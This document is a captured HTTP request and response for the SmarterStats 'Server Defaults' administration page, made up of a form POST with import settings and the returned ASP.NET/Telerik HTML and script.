ctl00%24MPH%24ImportingServerFields1%24lstBasePriority_SettingDropDown=belownormal&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_ClientState=&ctl00%24MPH%24ImportingServerFields1%24lstCompressionLevel_SettingDropDown=1&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_ClientState=&ctl00%24MPH%24ImportingServerFields1%24tfDateRangePicker_SettingText2%24dateInput=2010-10-12-23-59-00&ctl00%24MPH%24ImportingServerFields1%24txtSessionTimeout_SettingText=15&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_text=11%3a59+PM&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_ClientState=&ctl00%24MPH%24ImportingServerFields1%24txtDebugLevel_SettingText=10&ctl00%24MPH%24ImportingServerFields1%24txtRowSleepTime_SettingText=1&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_ClientState=&ctl00%24MPH%24ImportingServerFields1%24tfDateRangePicker_SettingText1=2010-10-12-00-00-00&__EVENTTARGET=&ctl00%24MPH%24ImportingServerFields1%24tfDateRangePicker_SettingText2=2010-10-12-23-59-00&__EVENTARGUMENT=&ctl00%24MPH%24ImportingServerFields1%24tfDateRangePicker_SettingText1%24dateInput=2010-10-12-00-00-00&ctl00%24MPH%24ImportingServerFields1%24txtReaderThreads_SettingText=1&ctl00%24MPH%24ImportingServerFields1%24txtMaxSessions_SettingText=100000&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_text=12%3a00+AM&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_ClientState=&__VIEWSTATE=[ViewState value omitted]&ctl00%24MPH%24ImportingServerFields1%24txtRowsBeforeSleep_SettingText=500&ctl00%24MPH%24ImportingServerFields1%24txtIdleTimeBetweenLoops_SettingText=15&ctl00%24MPH%24ImportingServerFields1%24txtReaderTimeSlice_SettingText=15&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_ClientState=

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:38 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:38 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38931
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Server Defaults - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmServerDefaults.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>



       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel2',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Server Defaults
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel2">
   
           <table id="ctl00_MPH_ImportingServerFields1_Table1" class="SettingsContainer SCMarginTop" border="0">
       <tr id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker">
           <td id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_Label" class="Indent Fixed">Import Time of Day</td><td id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_Setting" class="Setting"><table class='table'><tr><td><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_wrapper" class="RadPicker RadPicker_SmarterTools TimePickerOverride" style="display:inline;zoom:1;width:110px;">
               <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1" name="ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText1" type="text" class="rdfd_" value="2010-10-12-00-00-00" /><table cellspacing="0" class="rcTable" style="width:100%;">
                   <tr>
                       <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;"><input type="text" value="12:00 AM" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_text" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput" name="ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText1$dateInput" type="text" class="rdfd_" value="2010-10-12-00-00-00" /><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the time view popup." href="#" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timePopupLink" onclick="return CalendarPopup($find(&#39;ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1&#39;),&#39;time&#39;);"><img id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_TimePopupButton" src="/App_Themes/Default/Images/16x16/Upcoming.gif" alt="Open the time view popup." style="border-width:0px;" /></a><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_wrapper" style="display:none;width:250px;overflow-x:auto;" ><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView">
                           <table id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_tdl" class="RadCalendarTimeView RadCalendarTimeView_SmarterTools RadCalendarTimeView " cellspacing="0" border="0" style="width:250px;">
                               <tr>
                                   <th colspan="4" scope="col" class="rcHeader">Time Picker</th>
                               </tr><tr>
                                   <td><a href="#">7:00 AM</a></td><td><a href="#">7:15 AM</a></td><td><a href="#">7:30 AM</a></td><td><a href="#">7:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">8:00 AM</a></td><td><a href="#">8:15 AM</a></td><td><a href="#">8:30 AM</a></td><td><a href="#">8:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">9:00 AM</a></td><td><a href="#">9:15 AM</a></td><td><a href="#">9:30 AM</a></td><td><a href="#">9:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">10:00 AM</a></td><td><a href="#">10:15 AM</a></td><td><a href="#">10:30 AM</a></td><td><a href="#">10:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">11:00 AM</a></td><td><a href="#">11:15 AM</a></td><td><a href="#">11:30 AM</a></td><td><a href="#">11:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">12:00 PM</a></td><td><a href="#">12:15 PM</a></td><td><a href="#">12:30 PM</a></td><td><a href="#">12:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">1:00 PM</a></td><td><a href="#">1:15 PM</a></td><td><a href="#">1:30 PM</a></td><td><a href="#">1:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">2:00 PM</a></td><td><a href="#">2:15 PM</a></td><td><a href="#">2:30 PM</a></td><td><a href="#">2:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">3:00 PM</a></td><td><a href="#">3:15 PM</a></td><td><a href="#">3:30 PM</a></td><td><a href="#">3:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">4:00 PM</a></td><td><a href="#">4:15 PM</a></td><td><a href="#">4:30 PM</a></td><td><a href="#">4:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">5:00 PM</a></td><td><a href="#">5:15 PM</a></td><td><a href="#">5:30 PM</a></td><td><a href="#">5:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">6:00 PM</a></td><td><a href="#">6:15 PM</a></td><td><a href="#">6:30 PM</a></td><td><a href="#">6:45 PM</a></td>
                               </tr>
                           </table><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_ClientState" type="hidden" />
                       </div></div></td>
                   </tr>
               </table><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_ClientState" type="hidden" />
           </div></td><td class='RangeSeparator'>to</td><td><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_wrapper" class="RadPicker RadPicker_SmarterTools TimePickerOverride" style="display:inline;zoom:1;width:110px;">
               <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2" name="ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText2" type="text" class="rdfd_" value="2010-10-12-23-59-00" /><table cellspacing="0" class="rcTable" style="width:100%;">
                   <tr>
                       <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;"><input type="text" value="11:59 PM" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_text" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput" name="ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText2$dateInput" type="text" class="rdfd_" value="2010-10-12-23-59-00" /><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the time view popup." href="#" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timePopupLink" onclick="return CalendarPopup($find(&#39;ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2&#39;),&#39;time&#39;);"><img id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_TimePopupButton" src="/App_Themes/Default/Images/16x16/Upcoming.gif" alt="Open the time view popup." style="border-width:0px;" /></a><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_wrapper" style="display:none;width:250px;overflow-x:auto;" ><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView">
                           <table id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_tdl" class="RadCalendarTimeView RadCalendarTimeView_SmarterTools RadCalendarTimeView " cellspacing="0" border="0" style="width:250px;">
                               <tr>
                                   <th colspan="4" scope="col" class="rcHeader">Time Picker</th>
                               </tr><tr>
                                   <td><a href="#">7:00 AM</a></td><td><a href="#">7:15 AM</a></td><td><a href="#">7:30 AM</a></td><td><a href="#">7:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">8:00 AM</a></td><td><a href="#">8:15 AM</a></td><td><a href="#">8:30 AM</a></td><td><a href="#">8:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">9:00 AM</a></td><td><a href="#">9:15 AM</a></td><td><a href="#">9:30 AM</a></td><td><a href="#">9:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">10:00 AM</a></td><td><a href="#">10:15 AM</a></td><td><a href="#">10:30 AM</a></td><td><a href="#">10:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">11:00 AM</a></td><td><a href="#">11:15 AM</a></td><td><a href="#">11:30 AM</a></td><td><a href="#">11:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">12:00 PM</a></td><td><a href="#">12:15 PM</a></td><td><a href="#">12:30 PM</a></td><td><a href="#">12:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">1:00 PM</a></td><td><a href="#">1:15 PM</a></td><td><a href="#">1:30 PM</a></td><td><a href="#">1:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">2:00 PM</a></td><td><a href="#">2:15 PM</a></td><td><a href="#">2:30 PM</a></td><td><a href="#">2:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">3:00 PM</a></td><td><a href="#">3:15 PM</a></td><td><a href="#">3:30 PM</a></td><td><a href="#">3:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">4:00 PM</a></td><td><a href="#">4:15 PM</a></td><td><a href="#">4:30 PM</a></td><td><a href="#">4:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">5:00 PM</a></td><td><a href="#">5:15 PM</a></td><td><a href="#">5:30 PM</a></td><td><a href="#">5:45 PM</a></td>
                               </tr><tr>
                                   <td><a href="#">6:00 PM</a></td><td><a href="#">6:15 PM</a></td><td><a href="#">6:30 PM</a></td><td><a href="#">6:45 PM</a></td>
                               </tr>
                           </table><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_ClientState" type="hidden" />
                       </div></div></td>
                   </tr>
               </table><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_ClientState" type="hidden" />
           </div></td></tr></table></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtReaderThreads">
           <td id="ctl00_MPH_ImportingServerFields1_txtReaderThreads_Label" class="Indent Fixed">Import Threads</td><td id="ctl00_MPH_ImportingServerFields1_txtReaderThreads_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtReaderThreads_SettingText" type="text" value="1" size="3" id="ctl00_MPH_ImportingServerFields1_txtReaderThreads_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_lstBasePriority">
           <td id="ctl00_MPH_ImportingServerFields1_lstBasePriority_Label" class="Indent Fixed">Import Priority</td><td id="ctl00_MPH_ImportingServerFields1_lstBasePriority_Setting" class="Setting"><select name="ctl00$MPH$ImportingServerFields1$lstBasePriority_SettingDropDown" id="ctl00_MPH_ImportingServerFields1_lstBasePriority_SettingDropDown">
               <option value="idle">Idle</option>
               <option selected="selected" value="belownormal">Below Normal</option>
               <option value="normal">Normal</option>

           </select></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops">
           <td id="ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops_Label" class="Indent Fixed">Import Frequency</td><td id="ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtIdleTimeBetweenLoops_SettingText" type="text" value="15" size="3" id="ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops_SettingText" class="text" /> Minute(s)</td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice">
           <td id="ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice_Label" class="Indent Fixed">Import Time per Site</td><td id="ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtReaderTimeSlice_SettingText" type="text" value="15" size="3" id="ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice_SettingText" class="text" /> Minute(s)</td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep">
           <td id="ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep_Label" class="Indent Fixed">Rows Before Sleep</td><td id="ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtRowsBeforeSleep_SettingText" type="text" value="500" size="3" id="ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtRowSleepTime">
           <td id="ctl00_MPH_ImportingServerFields1_txtRowSleepTime_Label" class="Indent Fixed">Row Sleep Time</td><td id="ctl00_MPH_ImportingServerFields1_txtRowSleepTime_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtRowSleepTime_SettingText" type="text" value="1" size="3" id="ctl00_MPH_ImportingServerFields1_txtRowSleepTime_SettingText" class="text" /> Millisecond(s)</td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtDebugLevel">
           <td id="ctl00_MPH_ImportingServerFields1_txtDebugLevel_Label" class="Indent Fixed">Debug Level</td><td id="ctl00_MPH_ImportingServerFields1_txtDebugLevel_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtDebugLevel_SettingText" type="text" value="10" size="3" id="ctl00_MPH_ImportingServerFields1_txtDebugLevel_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_lstCompressionLevel">
           <td id="ctl00_MPH_ImportingServerFields1_lstCompressionLevel_Label" class="Indent Fixed">Compression Level</td><td id="ctl00_MPH_ImportingServerFields1_lstCompressionLevel_Setting" class="Setting"><select name="ctl00$MPH$ImportingServerFields1$lstCompressionLevel_SettingDropDown" id="ctl00_MPH_ImportingServerFields1_lstCompressionLevel_SettingDropDown">
               <option value="0">0 - No Compression (fastest)</option>
               <option selected="selected" value="1">1</option>
               <option value="2">2</option>
               <option value="3">3</option>
               <option value="4">4</option>
               <option value="5">5 (Default)</option>
               <option value="6">6</option>
               <option value="7">7</option>
               <option value="8">8</option>
               <option value="9">9 - Maximum Compression (slowest)</option>

           </select></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtMaxSessions">
           <td id="ctl00_MPH_ImportingServerFields1_txtMaxSessions_Label" class="Indent Fixed">Max Sessions Per Site</td><td id="ctl00_MPH_ImportingServerFields1_txtMaxSessions_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtMaxSessions_SettingText" type="text" value="100000" size="3" id="ctl00_MPH_ImportingServerFields1_txtMaxSessions_SettingText" class="text" /></td>
       </tr><tr id="ctl00_MPH_ImportingServerFields1_txtSessionTimeout">
           <td id="ctl00_MPH_ImportingServerFields1_txtSessionTimeout_Label" class="Indent Fixed">Session Timeout</td><td id="ctl00_MPH_ImportingServerFields1_txtSessionTimeout_Setting" class="Setting"><input name="ctl00$MPH$ImportingServerFields1$txtSessionTimeout_SettingText" type="text" value="15" size="3" id="ctl00_MPH_ImportingServerFields1_txtSessionTimeout_SettingText" class="text" /> Minute(s)</td>
       </tr>
   </table>

       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/defaults/frmserverdefaults', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { SetTopTitle('Server\x20Defaults'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"12:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText1\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_ClientState","dateFormat":"h:mm tt","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":true},"displayDateFormat":"h:mm tt","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadTimeView, {"_ItemsCount":48,"_OwnerDatePickerID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1","_TimeOverStyleCss":"rcHover","_culture":"en-US","_renderDirection":"Horizontal","_timeFormat":"t","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_ClientState","columns":4,"endTime":"0-19-0-0-0","interval":"0-0-15-0-0","itemStyles":{"TimeStyle": ["", ""],"AlternatingTimeStyle": ["", ""],"HeaderStyle": ["", "rcHeader"],"FooterStyle": ["", "rcFooter"],"TimeOverStyle": ["", "rcHover"]},"startTime":"0-7-0-0-0"}, null, null, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateTimePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "", ResolvedHoverImageUrl : ""},"_TimePopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_popupButton","_timePopupControlID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timePopupLink","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_ClientState","focusedDate":"2010-10-12-00-00-00","maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00"}, null, {"dateInput":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput","timeView":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView"}, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"11:59 PM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText2\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput_ClientState","dateFormat":"h:mm tt","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":true},"displayDateFormat":"h:mm tt","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadTimeView, {"_ItemsCount":48,"_OwnerDatePickerID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2","_TimeOverStyleCss":"rcHover","_culture":"en-US","_renderDirection":"Horizontal","_timeFormat":"t","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView_ClientState","columns":4,"endTime":"0-19-0-0-0","interval":"0-0-15-0-0","itemStyles":{"TimeStyle": ["", ""],"AlternatingTimeStyle": ["", ""],"HeaderStyle": ["", "rcHeader"],"FooterStyle": ["", "rcFooter"],"TimeOverStyle": ["", "rcHover"]},"startTime":"0-7-0-0-0"}, null, null, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateTimePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "", ResolvedHoverImageUrl : ""},"_TimePopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/Upcoming.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_popupButton","_timePopupControlID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timePopupLink","clientStateFieldID":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_ClientState","focusedDate":"2010-10-12-00-00-00","maxDate":"2100-01-01-00-00-00","minDate":"1900-01-01-00-00-00"}, null, {"dateInput":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_dateInput","timeView":"ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2_timeView"}, $get("ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText2"));
});
modules['vmNumber_txt']='Must be a number';
modules['vmNumberGreater_txt']='Must be {0} or greater';
modules['vmNumberLess_txt']='Must be {0} or less';
$(function() {$vc({"lt":"Import Threads","vcID":"ctl00_MPH_ImportingServerFields1_txtReaderThreads_SettingText","VMs":["vmNumber","vmNumberGreater","vmNumberLess"],"VPs":{"vmRequired":true,"vmNumberGreater":1,"vmNumberLess":100}},false);});
